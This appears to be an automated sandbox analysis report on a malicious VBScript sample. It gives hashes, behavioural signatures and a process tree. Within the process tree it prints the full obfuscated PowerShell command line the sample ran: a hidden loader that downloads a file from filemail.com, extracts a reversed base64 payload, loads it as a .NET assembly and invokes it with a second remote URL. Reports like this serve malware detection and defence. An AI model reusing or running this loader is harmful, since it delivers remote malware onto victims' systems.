Analysis

max time kernel: 14s
max time network: 18s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 07-11-2024 15:52
Static task: static1

Behavioral task: behavioral1
  Sample: dfcugh.vbs
  Resource: win7-20241010-en

Behavioral task: behavioral2
  Sample: dfcugh.vbs
  Resource: win10v2004-20241007-en
General

Target: dfcugh.vbs
Size: 13KB
MD5: 4f3e6d1619f31390de9a461391f10dba
SHA1: 9d90fa6b3bb7809fc800751c6cfc41dc68742a84
SHA256: 2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6
SHA512: f609e24d91a9ee08fe9b89f4909eb8745045d67b0b20d187d4586f5c382cefc2af96baacd1125aef96b71cc4eeeefdf0baa4467a1bb66637edfedacca9615427
SSDEEP: 384:CiQvc9iQZ4T6+wi7Ahrd5RxEA/mywQfD6U512ChMsB+5wZ/f3CPR:CiQk9iQzn512ChMsB+4/fyPR
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures

Blocklisted process makes network request (4 IoCs)
  Processes:
    flow  pid   Process
    3     2220  WScript.exe
    4     2220  WScript.exe
    6     2168  powershell.exe
    7     2168  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run PowerShell and hide display window.
  Processes:
    pid   Process
    2168  powershell.exe
    2952  powershell.exe

Command and Scripting Interpreter: JavaScript (1 TTPs)

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
    description             flow  ioc
    HTTP User-Agent header  3     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  4     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid   Process
    2952  powershell.exe
    2168  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  2952  powershell.exe
    Token: SeDebugPrivilege  2168  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  Processes:
    description                       pid   Process         procid_target
    PID 2820 wrote to memory of 2220  2820  WScript.exe     30
    PID 2820 wrote to memory of 2220  2820  WScript.exe     30
    PID 2820 wrote to memory of 2220  2820  WScript.exe     30
    PID 2220 wrote to memory of 2952  2220  WScript.exe     31
    PID 2220 wrote to memory of 2952  2220  WScript.exe     31
    PID 2220 wrote to memory of 2952  2220  WScript.exe     31
    PID 2952 wrote to memory of 2168  2952  powershell.exe  33
    PID 2952 wrote to memory of 2168  2952  powershell.exe  33
    PID 2952 wrote to memory of 2168  2952  powershell.exe  33
Processes

1. C:\Windows\System32\WScript.exe (PID 2820)
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"
   Signatures:
     Suspicious use of WriteProcessMemory

  2. C:\Windows\System32\WScript.exe (PID 2220)
     Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"
     Signatures:
       Blocklisted process makes network request
       Suspicious use of WriteProcessMemory

    3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2952)
       Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
       Signatures:
         Command and Scripting Interpreter: PowerShell
         Suspicious behavior: EnumeratesProcesses
         Suspicious use of AdjustPrivilegeToken
         Suspicious use of WriteProcessMemory

      4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2168)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"
         Signatures:
           Blocklisted process makes network request
           Command and Scripting Interpreter: PowerShell
           Suspicious behavior: EnumeratesProcesses
           Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 3d68e0db63d092d83baf5f2e61a2240c
SHA1: 54bec790443c5eceea3819b516714d8d73588684
SHA256: 718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a
SHA512: 115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 279251588d1506453bc89a67fa008a29
SHA1: ea79e3bbb3a8cf2f0f9982c93e8ed75eafa95c9b
SHA256: 998d87d34c57c22aa5f8995138b5230bfad2ff58eaebc1c96e4c930bbac61644
SHA512: 342f3bfdfb3fe94d29f8232f9de9f832a4df547e78dd341209f001a7dd25d322ce4ac1600ab738cfe62c3a086a413e7e0b8b2ec19ca5a8a23f6853abdca2de0a